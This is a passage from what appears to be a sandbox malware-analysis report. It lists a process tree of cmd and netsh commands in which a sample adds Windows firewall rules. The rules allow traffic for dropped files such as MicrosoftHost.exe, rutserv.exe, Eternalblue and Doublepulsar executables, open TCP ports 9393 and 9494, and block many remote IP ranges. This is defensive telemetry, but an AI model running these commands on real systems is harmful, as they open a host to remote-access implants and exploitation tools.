                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                    5⤵
                                                                                                                    • Modifies Windows Firewall
                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                    PID:1212
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                  4⤵
                                                                                                                    PID:880
                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                      netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                      5⤵
                                                                                                                      • Modifies Windows Firewall
                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                      PID:1516
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                    4⤵
                                                                                                                      PID:2168
                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                        netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                        5⤵
                                                                                                                        • Modifies Windows Firewall
                                                                                                                        PID:1600
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                      4⤵
                                                                                                                        PID:2524
                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                          netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                          5⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                          PID:376
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                        4⤵
                                                                                                                          PID:2084
                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                            netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                            5⤵
                                                                                                                            • Modifies Windows Firewall
                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                            PID:1704
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                          4⤵
                                                                                                                            PID:1956
                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                              netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                              5⤵
                                                                                                                              • Modifies Windows Firewall
                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:2132
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                            4⤵
                                                                                                                              PID:2680
                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                5⤵
                                                                                                                                • Modifies Windows Firewall
                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:584
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
                                                                                                                              4⤵
                                                                                                                                PID:1996
                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
                                                                                                                                  5⤵
                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                  PID:1940
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
                                                                                                                                4⤵
                                                                                                                                  PID:1336
                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                    netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:2452
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
                                                                                                                                  4⤵
                                                                                                                                    PID:1820
                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                      netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
                                                                                                                                      5⤵
                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                      PID:2780
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
                                                                                                                                    4⤵
                                                                                                                                      PID:900
                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                        netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
                                                                                                                                        5⤵
                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                        PID:2440
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
                                                                                                                                      4⤵
                                                                                                                                        PID:2860
                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                          netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
                                                                                                                                          5⤵
                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:3052
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
                                                                                                                                        4⤵
                                                                                                                                          PID:2816
                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                            netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
                                                                                                                                            5⤵
                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                            PID:2604
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
                                                                                                                                          4⤵
                                                                                                                                            PID:1296
                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                              netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                              PID:3060
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
                                                                                                                                            4⤵
                                                                                                                                              PID:1040
                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
                                                                                                                                                5⤵
                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                PID:400
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
                                                                                                                                              4⤵
                                                                                                                                                PID:2760
                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                  netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
                                                                                                                                                  5⤵
                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                  PID:2512
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
                                                                                                                                                4⤵
                                                                                                                                                  PID:1712
                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                    netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
                                                                                                                                                    5⤵
                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                    PID:2776
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
                                                                                                                                                  4⤵
                                                                                                                                                    PID:1284
                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                      netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
                                                                                                                                                      5⤵
                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                      PID:548
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2908
                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                        netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
                                                                                                                                                        5⤵
                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                        PID:2000
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:1976
                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                        netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
                                                                                                                                                        5⤵
                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                        PID:2696
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2836
                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                          netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
                                                                                                                                                          5⤵
                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                          PID:1956
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1924
                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                            netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
                                                                                                                                                            5⤵
                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                            PID:1620
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2992
                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                              netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
                                                                                                                                                              5⤵
                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:2024
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
                                                                                                                                                            4⤵
                                                                                                                                                              PID:1556
                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
                                                                                                                                                                5⤵
                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                PID:2284
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
                                                                                                                                                              4⤵
                                                                                                                                                                PID:1140
                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                  netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:708
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:2120
                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                    netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                    PID:2316
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:2592
                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                      netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                      PID:2508
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1752
                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                        netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                        PID:2560
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2944
                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                          netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                          PID:1592
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:2072
                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                            netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                            PID:1600
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2976
                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                              netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                              PID:768
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:2116
                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                PID:912
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1596
                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                  netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  PID:1492
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:336
                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                    netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                    PID:3044
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  PID:2524
                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                    netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
                                                                                                                                                                                    5⤵
                                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:2972
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:2792
                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                      netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:2756
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:2736
                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                        netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                        PID:2620
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:2228
                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                          netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                          PID:2368
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:1656
                                                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                            netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                            PID:2408
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:2844
                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                              netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                              PID:2344
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:2132
                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                PID:2632
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:1620
                                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                                  PID:1252
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:2024
                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                    netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                    PID:1572
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:876
                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                      netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                                                      PID:2436
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:2276
                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                        netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                                                        PID:2468
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:1224
                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                          netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
                                                                                                                                                                                                          5⤵
